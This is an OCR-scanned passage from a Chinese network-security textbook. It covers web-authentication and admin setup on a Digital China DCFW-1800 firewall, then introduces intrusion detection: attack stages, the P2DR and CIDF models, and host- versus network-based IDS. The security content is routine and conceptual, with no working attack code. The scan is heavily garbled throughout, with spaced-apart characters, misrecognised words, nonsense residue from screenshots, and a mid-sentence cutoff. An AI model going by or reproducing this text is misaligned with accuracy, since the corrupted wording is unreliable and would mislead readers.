# adminhost add 192.168.1.1 

# apply 

H save. 








4-56 ”命令 配置 管理 环境 
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图 4-57 WebUI 配置 管理 环境 
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4. 防火 墙 Web 认证 配置 
防火 墙 中 的 Web 认证 功能 默认 是 关闭 的 ,需要 手动 将 其 开启 ,如 图 4-58 所 示 。 








































































































“系统 > 管理 > 管理 接口 =Q | 
Console test |10 分 (0~60, 0 表示 永远 不 会 过 期 ) 
test 10 分 (1-60) 
Telnet 
%0 |23 (23, 1-65535) 
a 10 240-50) 
SSH 
端口 |22 (22, 1-65535) 
EBT |1440 — 23(1-1440) 
HTTP 端 口 ||80 (80, 1-65535) 
Web 
HTTPSWW1 443 — |(443,4-65535) 
HTTPS 信 和 任 域 | trust domain default w | 
超时 | 120 | 秒 (180, 20~86400) 
T HTTP 端 口 |8080 080, 1~65535) 
Web 认 证 (8i ) 
HTTPS 端 口 || 44433 — |(44433, 1-865535) 
模式 | OB) OHTTP fiis; | @ HTTPS 模式 
系统 语言 英语 Y | 
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图 458 开启 Web 认证 
创建 一 个 用 户 认证 服务 器 ,如 图 4-59 所 示 。 目 前 防火 墙 支持 多 种 类 型 的 认证 方式 , 包 
括 本 地 认证 .RADIUS、Active-Directory 及 LDAP 认证 方式 。 本 例 中 采用 防火 墙 本 地 认证 
方式 。 
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图 4-59 创建 一 个 用 户 认 证 服务 器 


为 使 不 同 权限 的 用 户 能 分 组 管理 ,为 他 们 创建 用 户 组 ,如 图 4-60 所 示 。 本 例 中 创建 两 
个 用 户 组 , 即 usergroupl 和 usergroup2。usergroupl 组 用 来 容纳 具有 Web 访问 权限 的 用 
J” usergroup? 组 用 来 容纳 具有 FTP 权限 的 用 户 。 
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图 4-60 创建 用 户 组 


为 每 个 上 网 用 户 创建 Web 验证 使 用 的 用 户 名 .口令 ,创建 用 户 过 程 中 将 加 入 相应 的 用 
户 组 。 如 图 4-61 所 示 的 过 程 是 创建 userl 用 户 并 加 入 到 usergroupl 组 中 。 








图 4-61 创建 用 户 userl 并 加 入 用 户 组 usergroupl 
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创建 user2 用 户 ,并 加 入 usergroup2 组 中 ,如 图 4-62 所 示 。 





图 4-62 创建 用 户 user2 并 加 入 用 户 组 usergroup2 
创建 允许 访问 Web 的 permit 角色 ,将 被 用 来 赋予 不 同 的 用 户 组 ,如 图 4-63 所 示 。 





图 4-63 ”创建 permit 角色 
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因为 在 后 面 制定 安全 策略 时 ,所 有 的 动作 都 是 针对 角色 制定 的 ,所 以 需要 事先 将 角色 与 
相应 的 用 户 组 定义 好 对 应 关系 ,如 图 4-64 所 示 , 这 就 是 “角色 映射 "的 作用 。 
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图 4-64 创建 用 户 组 usergroupl 和 usergroup2 的 角色 


将 角色 映射 规则 绑 定 到 AAA 认证 服务 器 上 。 通 过 绑 定 角色 映射 规则 ,AAA 服务 器 能 
知道 角色 与 AAA 服务 器 中 用 户 的 对 应 关系 ,如 图 4-65 所 示 。 
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4-65 本 地 用 户 角 色 映 射 AAA 服务 器 
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添加 trust>untrust 的 安全 策略 ,这 条 策略 的 目的 是 执行 DNS 服务 。 输 入 域名 后 可 以 
先 解析 再 重 定 向 ,如 图 4-66 所 示 。 
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确定 取消 
图 4-66 添加 访问 DNS 的 安全 策略 
添加 trust untrust 的 安全 策略 ,如 图 4-67 所 示 ,这 条 策略 的 目的 是 要 将 未 通过 验证 用 
户 的 Web 页 面 重 定向 到 用 户 名 口令 验证 页 面 。 
— 














图 467 添加 访问 Web 的 安全 策略 


$43 防火 墙 技术 195 





添加 第 二 条 trust>untrust 策略 。 这 条 策略 允许 角色 为 role-permit-web 且 通 过 验证 的 
用 户 访问 互联 网 的 Web 服务 ,如 图 4-68 所 示 。 


g 

















图 4-68 添加 允许 访问 Web 的 安全 策略 


添加 第 三 条 trust>untrust 策略 。 这 条 策略 允许 角色 为 role-permit-ftp 且 通 过 验证 的 
用 户 访问 互联 网 的 FTP 服务 ,如 4-49 所 示 。 




















图 4-69 添加 允许 访问 FTP 的 安全 策略 
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一 定 要 保证 对 于 UNKNOW 用 户 验证 的 策略 置 于 第 一 条 。 配 置 完 的 策略 顺序 如 图 4-70 
所 示 。 
安全 > em > Pis 
met vos —v BHegeM[umst Ü [m=] [ w | 
pus[20 wl mm 
从 tmust 到 untrust Ssnan v [amra ] 
= | o | 角色 源 地 址 目的 地 址 服务 特征 | 6*5 sr 
T Any Any Any DNS o9 Pith 
| 2 | UNKNOWN Any Any Any @ rìn 
m axi role-permp Any Am FTP |o ith 
5 |  rolepernip An Am He 9 mamn 
































图 4-70 完成 的 策略 顺序 
以 访问 FTP 站 点 为 例 。 只 有 通过 认证 的 role-permit-ftp 角色 用 户 才能 使 用 FTP 服务 
(如 图 4-71 所 示 ) ,也 就 是 需要 使 用 usergroup1 组 中 的 userl 用 户 登 录 验 证 。 


(C Web Authentication - Windows Internet Explorer 
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Fie Edt View Favorites Tools Help 

















V dE [web authentication 





神州 数码 


Digital China 


登录 成 功 ! 请 在 上 网 期 间 保持 此 页 面 打开 





图 4-71 策略 访问 FTP 实例 
s. 管理 用 户 的 设置 
V2 防火 墙 默认 的 管理 员 是 admin, 可 以 对 其 进行 修改 ,但 不 能 删除 这 个 管理 员 。 增 加 
一 个 管理 员 的 命令 如 下 : 
DCFW — 1800(conf ig) # admin user user - name 


执行 该 命令 后 ,系统 创建 指定 名 称 的 管理 员 ,并 且 进入 管理 员 配置 模式 ; 如 果 指 定 的 管 
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理 员 名 称 已 经 存在 , 则 直接 进入 管理 员 配 置 模式 。 

管理 员 特 权 为 管理 员 登 录 设 备 后 拥有 的 权限 。DCFOS 允许 的 权限 有 RX 和 RXW 
两 种 。 

在 管理 员 配 置 模式 下 ,输入 以 下 命令 配置 管理 员 的 特权 : 


DCFW — 1800(conf ig — admin) # privilege {RX | RXW) 
在 管理 员 配 置 模式 下 ,输入 以 下 命令 配置 管理 员 的 口令 : 


DCFW - 1800(conf ig - admin) # password password 


6. 将 防火 墙 配置 恢复 到 出 厂 


将 防火 墙 恢 复 到 出 厂 的 方法 : 四 用 户 使 用 设备 上 的 Ctrl 键 使 系统 恢复 到 出 厂 配 置 ; 
@ 恢 复出 厂 配置 ,在 执行 模式 下 ,使 用 以 下 命令 (如 图 4-72 所 示 ): 


ruleconfig load default 


e DCFW 1800 ERE 


# ruleconfig load default 
m o a 


- emfiguration will be lost after factory one | tored. It' 
s better to save your current configuration first. Are you readv((u/n)) 

100% Rules loaded successfully? 

# apply 

M save 





图 4-72 恢复 出 厂 默 认 配 置 
此 时 防火 墙 将 恢复 到 出 厂 默 认 配 置 ,并 自动 重启 设备 。 


BSE 入侵 检测 技术 


在 网 络 安全 系统 中 ,防火墙 所 起 的 作用 类 似 于 门卫 ,是 第 一 道 防线 ,将 内 部 网 和 互联 网 
隔离 ,在 两 个 网 络 通信 时 执行 访问 控制 策略 。 但 防火 墙 无 法 阻挡 发 生 在 网 络 内 部 的 攻击 ,入 
侵 检测 系统 如 同一 座 大 厦 的 视频 监控 系统 可 以 监视 什么 人 进 了 大 厦 、 进 入 大 厦 后 到 了 什么 
地 方 ,做 了 什么 事 , 和 人 侵 检测 系统 可 以 发 现 网 络 内 部 的 异常 攻击 .登录 主机 后 的 异常 操作 等 。 
本 章 重 点 介绍 人 侵 检 测 系统 的 基本 原理 与 基本 框架 .主要 作用 、 分 类 方法 、 实 现 过 程 、 检 测 模 
型 .性 能 指标 以 及 产品 的 部 署 与 实现 。 





5.1. 人 侵 检 测 技术 概述 
5.1.1. 网 络 威胁 和 入 侵 行为 的 一 般 过 程 


1. 计算 机 系统 面临 的 威胁 

威胁 是 指 利用 计算 机 和 网 络 系统 在 系统 设计 或 者 配置 和 管理 方面 的 漏洞 ,对 系统 的 安 
全 造成 威胁 的 行为 ,无 论 这 种 行为 是 无 意 的 还 是 有 意 的 。 这 些 威胁 行为 从 广义 上 说 , 既 包括 
对 系统 的 探测 又 包括 系统 的 攻击 和 入 侵 。 主 要 的 威胁 行为 包括 拒绝 服务 (服务 请 求 超载 、 
SYN 洪水 、 报 文 超载 ) .欺骗 (IP 欺骗 .路 由 欺骗 .DNS 欺骗 、Web 欺骗) .监听 .口令 破解 、 森 
马 、 缓 冲 区 溢出 ICMP 秘密 通道 和 TCP 会 话 劫持 等 。 

2. 入 侵 行为 的 一 般 过 程 

(OD 确定 攻击 目标 。 攻击 者 根据 其 目的 不 同 会 选择 不 同 的 攻击 对 象 。 攻 击 行为 的 初始 
步骤 是 搜集 攻击 对 象 的 尽 可 能 详细 的 信息 。 这 些 信息 包括 攻击 对 象 操作 系统 的 类 型 及 版 
本 、 攻 击 对 象 提供 哪些 网 络 服务 .各 服务 程序 的 类 型 及 版 本 以 及 相关 的 社会 信息 。 攻 击 对 象 
操作 系统 的 不 同 决定 了 攻击 方法 的 不 同 。 对 于 攻击 对 象 操作 系统 的 决定 ,一 般 是 通过 正常 
访问 过 程 中 系统 返回 的 有 关 信息 进行 判断 。 另 一 种 方法 是 通过 向 攻击 对 象 发 送 特殊 的 网 络 
数据 包 ,根据 攻击 对 象 的 不 同 反应 区 别 不 同 的 操作 系统 及 版 本 。 这 种 判定 方法 的 基础 是 对 
不 同 的 操作 系统 ,TCP/IP 栈 的 实现 是 不 同 的 。 这 种 方法 又 称 为 TCP/IP 栈 指纹 识别 。 网 
络 服务 、 服 务 程序 及 其 版 本 的 不 同 也 决定 了 攻击 者 要 采用 不 同 的 攻击 方法 。 这 是 因为 不 同 
的 网 络 服务 ,以 及 实现 这 些 服 务 的 不 同 版 本 的 服务 程序 可 以 利用 的 漏洞 是 不 同 的 。 一 些 与 
计算 机 系统 无 关 的 社会 信息 同样 不 能 忽视 ,它们 往往 是 构造 信息 探测 字典 的 基础 ,甚至 影响 
到 攻击 发 起 的 时 间 。 

(2) 实施 攻击 。 当 获得 了 攻击 对 象 足够 多 的 信息 后 ,攻击 者 采用 的 一 种 攻击 方法 是 利 
用 相关 漏洞 渗透 进 目标 系统 内 部 进行 信息 的 窃取 或 破坏 。 一 般 来 说 ,这 些 行为 都 要 经 过 一 
个 先期 获取 普通 合法 用 户 权限 ,进而 获取 超级 用 户 权限 的 过 程 。 这 是 因为 很 多 信息 窃取 和 
破坏 操作 必须 要 有 超级 用 户 的 权限 才能 够 进行 ,所 以 必须 加 强 对 用 户 权限 特别 是 超级 用 户 
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权限 的 管理 和 监督 。 现 在 使 用 越 来 越 多 的 攻击 手段 是 分 布 式 拒绝 服务 攻击 (DDoS) ,采用 的 
是 另 一 种 攻击 方法 。 它 根本 不 用 获得 什么 权限 ,而 是 采用 比较 具有 破坏 性 的 方式 , 即 靠 大 量 
的 数据 包 淹 没 服务 器 来 达到 破坏 攻击 对 象 服务 能 力 的 目的 。 这 种 攻击 方法 相对 简单 ,但 是 
破坏 效果 显著 ,是 计算 机 用 户 需 要 重点 提防 的 攻击 类 型 。 

CD 攻击 后 处 理 。 攻 击 者 在 成 功 实施 完 攻 击 行为 后 ,最 后 需要 做 的 是 全 身 而 退 , 即 消除 
登录 路 径 上 的 路 由 记录 ,消除 攻击 对 象 系统 内 的 人 侵 痕 迹 ( 主 要 指 删除 系统 日 志 中 的 相关 记 
录 ) ,根据 需要 设置 后 门 等 秘密 通道 为 下 一 次 的 入 侵 行为 做 准备 。 至 此 ,一 个 经 典 的 攻击 过 
程 就 完成 了 。 

5.1.2. 入 侵 检 测 的 基本 概念 


5.1.1 节 描述 了 计算 机 网 络 面临 的 种 种 威胁 ,对 于 这 些 威胁 ,诸如 防火 墙 等 传统 的 安全 
措施 往往 不 能 很 好 地 处 理 。 最 好 的 处 理 办 法 就 是 为 用 户 部 署 专 门 针 对 这 些 威胁 而 设置 的 入 
侵 检测 系统 。 

入 侵 检 测 ,简单 地 说 就 是 检测 并 响应 针对 计算 机 系统 或 网 络 的 人 侵 行为 的 学 科 。 它 包 
括 对 系统 的 非法 访问 和 越权 访问 的 检测 ; 包括 监视 系统 运行 状态 ,以 发 现 各 种 攻击 企图 、 攻 
击 行为 或 者 攻击 结果 ; 还 包括 针对 计算 机 系统 或 网 络 的 恶意 试探 的 检测 。 而 上 述 各 种 人 侵 
行为 的 判定 , 即 检测 的 操作 ,是 通过 在 计算 机 系统 或 网 络 的 各 个 关键 点 上 收集 数据 并 进行 分 
析 来 实现 的 。1997 年 ,美国 国家 安全 通信 委员 会 (NSTAC) 下 属 的 人 侵 检测 小 组 (IDSG ) 给 
出 了 一 个 人 侵 检测 的 经 典 定义 , 即 人 侵 检测 是 对 企图 人 侵 .正在 进行 的 人 侵 或 者 已 经 发 生 的 
入 侵 进行 识别 的 过 程 。 

入 侵 检测 技术 就 是 通过 数据 的 采集 与 分 析 实 现 入 侵 行 为 检测 的 技术 ,而 入 侵 检 测 系统 
即 为 能 够 执行 入 侵 检 测 任务 的 软 、 硬 件 或 者 软件 与 硬件 相 结 合 的 系统 。 图 5-1 给 出 了 一 个 
通用 的 入 侵 检 测 系统 模型 。 
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51 通用 的 入 侵 检 测 系统 模型 示意 图 


其 中 主要 部 件 功能 简要 描述 如 下 。 

探测 器 : 也 称 为 数据 收集 器 ,负责 收集 入 侵 检测 系统 需要 的 信息 数据 ,包括 系统 日 志 记 
录 、 网 络 数据 包 等 内 容 。 

检测 引擎 : 也 称 为 分 析 器 或 者 检测 器 ,负责 对 探测 器 收集 的 数据 进行 分 析 。 一 旦 发 现 
有 人 侵 的 行为 , 即 可 发 出 告警 信息 。 
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控制 器 : 根据 检测 器 发 出 的 告警 信息 ,针对 发 现 的 入 侵 行为 ,自动 地 做 出 响应 动作 。 

数据 库 : 为 检测 引擎 和 数据 库 提供 必要 的 数据 支持 。 包 括 检测 规则 集 、 历 史 数 据 及 响 
应 等 信息 。 

保护 随 着 计算 机 安全 技术 与 理论 的 不 断 深入 ,人 们 对 计算 机 安全 
技术 的 认识 也 越 来 越 深 刻 ,并 且 逐 步 匀 画 出 各 种 更 加 细致 和 精确 
的 安全 模型 作为 计算 机 安全 技术 应 用 与 发 展 的 指导 。 在 这 些 安全 
模型 中 ,P*DR 模型 由 于 具有 动态 、 自 适应 特性 ,符合 计算 机 安全 
运行 和 发 展 的 特点 ,所 以 被 越 来 越 多 的 人 所 接受 。 在 这 个 安全 模 
型 中 ,明确 了 入 侵 检测 技术 的 位 置 和 重要 作用 ,可 以 说 是 入 侵 检测 
技术 的 理论 基础 。 图 5-2 描述 了 这 种 PDR 模型 。 

P'DR 是 策略 (Policy) ,防护 (Protection) ,检测 (Detection) 和 响应 (Response) 的 缩写 。 
其 中 ,策略 是 整个 模型 的 核心 ,规定 了 系统 的 安全 目标 及 具体 措施 和 实施 强度 等 内 容 ; 防护 
是 指 具体 的 安全 规则 ,安全 配置 和 安全 设备 ; 检测 是 对 整个 系统 动态 的 监控 ; 响应 是 对 各 
种 人 侵 行为 及 其 后 果 的 及 时 响应 和 处 理 。 

从 这 个 模型 可 以 看 出 ,入 侵 检 测 技术 是 其 基础 性 的 关键 内 容 , 渗 透 到 模型 的 所 有 部 分 。 
人 侵 检测 技术 不 但 要 根据 安全 策略 对 系统 进行 配置 ,还 要 根据 入 侵 行 为 的 变化 ,动态 地 改变 
系统 各 个 模块 的 参数 ,协调 各 个 安全 设备 的 工作 ,以 优化 系统 的 防护 能 力 ,实现 对 入 侵 行为 
的 更 好 响应 。 安 全 策略 不 但 是 入 侵 检测 子 系统 的 一 个 重要 数据 来 源 , 而 且 随 着 系统 的 运行 
将 不 断 地 被 入 侵 检测 子 系统 优化 。 

随 着 Internet 的 迅猛 发 展 ,网 络 安全 越 来 越 受 到 政府 、 企 业 乃 至 个 人 的 重视 。 过 去 , 防 
范 网 络 外 部 攻击 最 常见 的 方法 是 防火 墙 ,然而 ,仅仅 依赖 防火 墙 并 不 能 保证 足够 的 安全 ,如 
果 把 防火 墙 比 作 网 络 门卫 ,那么 还 需要 可 以 主动 寻找 罪犯 的 巡警 , 即 人 侵 检 测 系统 
(Intrusion Detection System, IDS) 。 

入 侵 检测 技术 是 人 们 对 网 络 探测 与 攻击 技术 层出不穷 的 反应 ,其 研制 的 目的 是 通过 对 
系统 负载 的 深入 分 析 ,为 系统 提供 更 加 强大 .可 靠 的 主动 安全 策略 和 解决 方案 , 阻 断 更 加 隐 
蔽 的 网 络 探测 与 攻击 行为 。 入 侵 检测 技术 是 主动 保护 自己 免 受 攻 击 的 一 种 网 络 安全 技术 ， 
弥补 了 防火 墙 的 不 足 , 入 侵 检 测 技术 能 够 帮助 系统 对 付 网 络 内 部 攻击 ,扩展 了 系统 管理 员 的 
安全 管理 能 力 ( 包 括 安 全 审计 ,监视 ,攻击 识别 和 响应 ) ,提高 了 信息 安全 基础 结构 的 完整 性 。 

IDS 的 定义 是 : 通过 从 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 对 其 进行 
分 析 , 以 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 

IDS 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 前 提 下 ,能 对 网 络 进 
行 监测 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 。 

IDS 的 主要 功能 : 监控 ,分 析 用 户 和 系统 的 活动 ; 系统 构造 及 其 安全 漏洞 的 审计 ; 识别 
入 侵 的 活动 模式 并 向 网 络 管理 员 报 警 ; 对 异常 活动 的 统计 分 析 ; 操作 系统 的 审计 跟踪 管 
理 ,识别 违反 安全 策略 的 用 户 行为 ; 评估 关键 或 重要 系统 及 其 数据 文件 的 完整 性 。 

防火 墙 \IDS 和 安全 审计 作为 网 络 安全 系统 的 重要 组 成 部 分 ,三 者 之 间 相 互 独 立 、 相 互 
补充 ,三 者 关系 如 图 5-3 所 示 。 

IDS 不 仅 能 使 网 络 管理 员 了 解 网 络 系统 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制定 提供 
指南 。IDS 的 配置 和 管理 应 该 简单 .方便 ,使 非 专 业 人 员 容 易 操作 ,并且 能 按 需 求 进行 相应 





5-2 P'DR 模型 示意 图 
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的 改变 。IDS 一 旦 发 现 有 人 侵 者 留 下 的 踪迹 ,应 能 及 时 做 出 响应 ,切断 网 络 连接 .记录 事件 


并 进行 报警 。 
保护 发 现 
安全 威胁 


网 络 安 全 体系 


安全 


审计 
图 5-3 防火墙 \.IDS 和 安全 审计 关系 示意 图 


5.1.3. 入 侵 检 测 的 主要 作用 


(1) 识别 并 阻 断 系统 活动 中 存在 的 已 知 攻击 行为 ,防止 人 侵 行 为 对 受 保护 系统 造成 
损害 。 

(2) 识别 并 阻 断 系统 用 户 的 违法 操作 行为 或 者 越权 操作 行为 ,防止 用 户 对 受 保 护 系统 
有 意 或 者 无 意 的 破坏 。 

(3) 检查 受 保护 系统 的 重要 组 成 部 分 以 及 各 种 数据 文件 的 完整 性 。 

(4) 审计 并 弥补 系统 中 存在 的 弱点 和 漏洞 ,其 中 最 重要 的 一 点 是 审计 并 纠正 错误 的 系 
统 配置 信息 。 

(5) 记录 并 分 析 用 户 和 系统 的 行为 ,描述 这 些 行为 变化 的 正常 区 域 ,进而 识别 异常 的 
活动 。 

(6) 通过 蜜 护 等 技术 手段 记录 入 侵 者 的 信息 ,分 析 入 侵 者 的 目的 和 行为 特征 ,优化 系统 
安全 策略 。 

(7) 加 强 组 织 或 机 构 对 系统 和 用 户 的 监督 与 控制 能 力 , 提 高 管理 水 平和 管理 质量 。 


5.1.4. 入 侵 检 测 系统 的 组 成 


IETF(Internet 工程 任务 组 ) 将 一 个 IDS 分 为 4 个 组 件 , 即 事件 产生 器 (Event Generator) , 
事件 分 析 器 (Event Analyzer) .事件 响应 单元 (Response Unit) .事件 数据 库 (Event Database) , 简 
称 为 公共 入 侵 检 测 框架 (CIDF) ,其 结构 如 图 5-4 所 示 。 








事件 响应 单元 


事件 分 析 器 事件 数据 库 
i 
事件 产生 器 


图 5-4 CIDF 模型 示意 框图 


事件 产生 器 的 功能 是 从 整个 计算 环境 中 捕获 事件 信息 ,并 向 系统 的 其 他 组 成 部 分 提供 
该 事件 数据 ; 事件 分 析 器 分 析 得 到 的 事件 数据 ,并 产生 分 析 结果 ; 事件 响应 单元 则 是 对 分 
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析 结 果 做 出 反应 的 功能 单元 , 它 可 以 做 出 切断 连接 改变 文件 属性 等 有 效 反 应 ,当然 也 可 以 
只 是 报警 ; 事件 数据 库 是 存放 各 种 中 间 数 据 和 最 终 数据 的 地 方 的 统称 ,用 于 指导 事件 的 分 
析 及 反应 , 它 可 以 是 复杂 的 数据 库 ,也 可 以 是 简单 的 文本 文件 。 图 5-5 展示 一 个 典型 NIDS， 
一 个 传感器 被 安装 在 防火 墙 外 以 探查 来 自 Internet 的 攻击 , 另 一 个 传感器 安装 在 网 络 内 部 
以 探查 那些 已 穿 透 防火 墙 的 入 侵 和 内 部 网 络 入 侵 和 威胁 。 





IDS 传 感 器 


5-5 一 个 典型 NIDS 示 意图 


5.2. 人 侵 检测 的 分 类 


根据 不 同 的 标准 ,入 侵 检 测 可 以 划分 成 不 同 的 类 型 。 目 前 最 常用 的 划分 标准 是 检测 数 
据 的 来 源 和 检测 方法 。 根 据 检 测 数 据 的 来 源 不 同 , 可 以 将 入 侵 检 测 划分 成 基于 主机 的 、 基 于 
网 络 的 及 两 者 相互 结合 的 3 种 类 型 。 根 据 检 测 方 法 的 不 同 ,又 可 以 将 入 侵 检 测 划 分 成 异常 
检测 和 滥用 检测 两 大 类 型 。 


5.2.1 按照 检测 数据 的 来 源 划 分 


虽然 基于 主机 的 、 基 于 网 络 的 及 两 者 相互 结合 的 3 种 入 侵 检 测 类 型 的 具体 实现 和 操作 
是 完全 不 同 的 ,但 是 它们 的 本 质 都 是 通过 对 一 系列 事件 进行 分 析 , 并 与 已 有 的 历史 知识 相 比 
较 , 来 确定 是 否 发 生 入 侵 行为 的 种 类 。 下 面 分 别 对 这 3 种 类 型 进行 介绍 。 

1. 基于 主机 的 入 侵 检 测 系 统 

如 果 按 照 IDS 的 数据 来 源 范 围 来 划分 ,IDS 分 为 3 类 , 即 基于 主机 的 IDSCHost IDS. 
HIDS) .基于 网 络 的 IDSCNetwork IDS,NIDS) 和 分 布 式 IDSCDistributed IDS, DIDS)。 

基于 主机 的 人 侵 检测 系统 (Host IDS,HIDS) 可 以 部 署 在 各 种 计算 机 上 , 它 不 仅 能 够 安 
装 在 服务 器 上 ,甚至 可 以 安装 在 PC 上 或 者 笔记 本 电脑 中 。 通 常情 况 下 ,组 织 或 机 构 往 往 将 
HIDS 部 署 在 具有 较 高 价值 的 服务 器 上 作为 信息 安全 保障 的 重要 屏障 。 这 些 服务 器 包括 各 
种 关键 的 基础 网 络 服务 服务 器 .业务 服务 器 和 数据 库 服 务 器 等 。HIDS 是 系统 整体 安全 策 
略 实施 的 重要 环节 。 

HIDS 通常 是 安装 在 被 重点 检测 的 主机 之 上 ,主要 是 对 该 主机 的 网 络 实时 连接 以 及 系 
统 审计 日 志 进 行 智 能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 ( 特 征 或 违反 统计 规律 )， 
IDS 就 会 采取 相应 措施 。 

HIDS 使 用 验证 记录 ,并 发 展 了 精密 的 可 迅速 做 出 响应 的 检测 技术 。 通 常 ,HIDS 可 监 
探 系统 .事件 和 Windows NT 下 的 安全 记录 以 及 UNIX 环境 下 的 系统 记录 。 当 有 文件 发 生 
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变化 ,IDS 将 新 的 记录 条 目 与 攻击 标记 相 比较 ,看 是 否 匹 配 。 如 果 匹 配 ,系统 就 会 向 管理 员 
报警 并 向 别 的 目标 报告 ,以 采取 措施 。 

HIDS 在 发 展 过 程 中 融入 了 其 他 技术 。 对 关键 系统 文件 和 可 执行 文件 的 入侵 检测 的 一 
个 常用 方法 ,是 通过 定期 检查 校 验 和 来 进行 的 ,以 便 发 现 意 外 的 变化 。 反 应 的 快慢 与 轮 询 间 
隔 的 频率 有 直接 关系 。 最 后 ,许多 系统 都 是 监听 端口 的 活动 ,并 在 特定 端口 被 访问 时 向 管理 
员 报 警 。 这 类 检测 方法 将 基于 网 络 的 人 侵 检 测 的 基本 方法 融和 人 基于 主机 的 检测 环境 中 。 

尽管 HIDS 不 如 NIDS 快捷 ,但 它 确实 具有 基于 网 络 的 系统 无 法 比拟 的 优点 。 这 些 优 
点 包括 更 好 的 辨识 分 析 、 对 特殊 主机 事件 的 紧密 关注 及 低廉 的 成 本 。 

1) HIDS 的 优点 

CD 确定 攻击 是 否 成 功 。 由 于 基于 HIDS 使 用 含有 已 发 生 事件 信息 ,它们 可 以 比 NIDS 
更 加 准确 地 判断 攻击 是 否 成 功 。 在 这 方面 ,HIDS 是 NIDS 的 完美 补充 ,网 络 部 分 可 以 尽早 
提供 警告 ,主机 部 分 可 以 确定 攻击 成 功 与 否 。 

(2) 监视 特定 的 系统 活动 。HIDS 监视 用 户 和 访问 文件 的 活动 ,包括 文件 访问 、 改 变 文 
件 权 限 , 试 图 建立 新 的 可 执行 文件 并 且 / 或 者 试图 访问 特殊 的 设备 。 

例如 , HIDS 可 以 监督 所 有 用 户 的 登录 及 上 网 情况 ,以 及 每 位 用 户 在 连接 到 网 络 以 后 的 
行为 ,对 于 NIDS 要 做 到 这 个 程度 是 非常 困难 的 ; HIDS 可 监视 只 有 管理 员 才 能 实施 的 非 正 
常 行为 ,操作 系统 记录 了 任何 有 关 用 户 账号 的 增加 、 删 除 、 更 改 的 情况 ,只 要 改动 一 旦 发 生 ， 
HIDS 就 能 检测 到 这 种 不 适当 的 改动 ; HIDS 可 以 监视 主要 系统 文件 和 可 执行 文件 的 改变 ， 
系统 能 够 查 出 那些 欲 改写 重要 系统 文件 或 者 安装 特洛伊 木马 或 后 门 的 尝试 并 将 它们 中 断 ， 
而 NIDS 有 时 会 查 不 到 这 些 行为 。 

(3) 能 够 检查 到 NIDS 检查 不 出 的 攻击 。HIDS 可 以 检测 到 那些 NIDS 察觉 不 到 的 攻 
击 。 例 如 ,来 自主 要 服务 器 键盘 的 攻击 不 经 过 网 络 ,所 以 可 以 租 开 NIDS, 

(4) 适用 被 加 密 的 和 交换 的 环境 。 交 换 设备 将 大 型 网 络 分 成 许多 小 型 网 络 加 以 管理 ， 
从 覆盖 足够 大 的 网 络 范围 的 角度 出 发 ,很 难 确定 配置 NIDS 的 最 佳 位 置 ,业务 映射 和 交换 机 
上 的 管理 端口 虽然 有 助 于 此 ,但 这 些 技术 并 不 适用 。HIDS 可 安装 在 所 需 的 重要 主机 上 ,在 
交换 的 环境 中 具有 更 高 的 能 见 度 。 某 些 加 密 方式 也 向 NIDS 发 出 了 挑战 。 由 于 加 密 方式 位 
于 协议 堆栈 内 ,所 以 NIDS 可 能 对 某 些 攻击 没有 反应 ,然而 HIDS 就 没有 这 方面 的 限制 , 当 
操作 系统 及 HIDS 看 到 即将 到 来 的 业务 时 ,数据 流 已 经 被 解密 了 。 

(5) 近 于 实时 的 检测 和 响应 。 尽 管 HIDS 不 能 提供 真正 实时 的 反应 ,但 如 果 应 用 正确 ， 
反应 速度 可 以 非常 接近 实时 。 老 式 系统 利用 一 个 进程 在 预先 定义 的 间隔 内 检查 登记 文件 的 
状态 和 内 容 ,与 老式 系统 不 同 ,当前 HIDS 的 中 断 指 令 ,这 种 新 的 记录 可 被 立即 处 理 , 显 著 减 
少 了 从 攻击 验证 到 作出 响应 的 时 间 ,在 从 操作 系统 作出 记录 到 HIDS 得 到 辨识 结果 之 间 的 
这 段 时 间 是 一 段 延迟 ,但 大 多 数 情况 下 ,在 破坏 发 生 之 前 ,系统 就 能 发 现 人 侵 者 ,并 中 止 他 的 
攻击 。 

(6) 不 要 求 额外 的 硬件 设备 。HIDS 存在 于 现行 网 络 结构 之 中 ,包括 文件 服务 器 .Web 服 
务 器 及 其 他 共享 资源 ,这 使 得 HIDS 效率 很 高 。 因 为 它们 不 需要 在 网 络 上 另外 安装 硬件 设备 。 

(7) 记录 花费 更 加 低廉 。NIDS 比 HIDS 要 昂贵 得 多 。 

2) HIDS 的 弱点 

(1) 主机 IDS 安装 在 需要 保护 的 设备 上 , 当 一 个 数据 库 服务 器 需要 保护 时 ,就 要 在 服务 
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器 本 身上 安装 IDS。 这 会 降低 应 用 系统 的 效率 。 此 外 , 它 也 会 带 来 一 些 额外 的 安全 问题 , 安 
装 了 HIDS 后 ， E uns. 

(2) HIDS 依赖 于 服务 器 固有 的 日 志 与 监视 能 力 。 如 果 服 务 器 没有 配置 日 志 功 能 , 则 必 
须 重新 配置 ,这 将 会 给 运行 中 的 业务 系统 带 来 不 可 预见 的 性 能 影响 。 

(3) 全 面部 署 HIDS 代价 较 大 ,企业 中 很 难 将 所 有 主机 用 HIDS 保护 ,只 能 选择 部 分 主 
机 保护 。 那 些 未 安装 HIDS 的 机 器 将 成 为 保护 的 盲点 ,入 侵 者 可 利用 这 些 机 器 达到 攻击 
目标 。 

(4) HIDS 除了 监测 自身 的 主机 以 外 ,根本 不 监测 网 络 上 的 情况 。 对 入 侵 行 为 分 析 的 工 
作 量 将 随 着 主机 数目 的 增加 而 增加 。 

2. 基于 网 络 的 入 侵 检测 系统 

NIDS 通过 对 网 络 中 传输 的 数据 包 进 行 分 析 , 可 以 发 现 可 能 的 恶意 攻击 企图 。 一 个 典 
型 的 例子 是 在 不 同 的 端口 检查 大 量 的 TCP 连接 请 求 , 以 此 发 现 VA lagi 
NIDS 既 可 以 运行 在 仅仅 监视 自己 端口 的 主机 上 ,也 可 以 运行 在 监视 整个 网 络 状态 的 处 
混杂 模式 的 sniffer 主机 上 。 

目前 ,大 部 分 人 侵 检测 的 产品 是 基于 网 络 的 ,有 多 个 开放 过 滤 代 码 软 件 , 如 snort, 
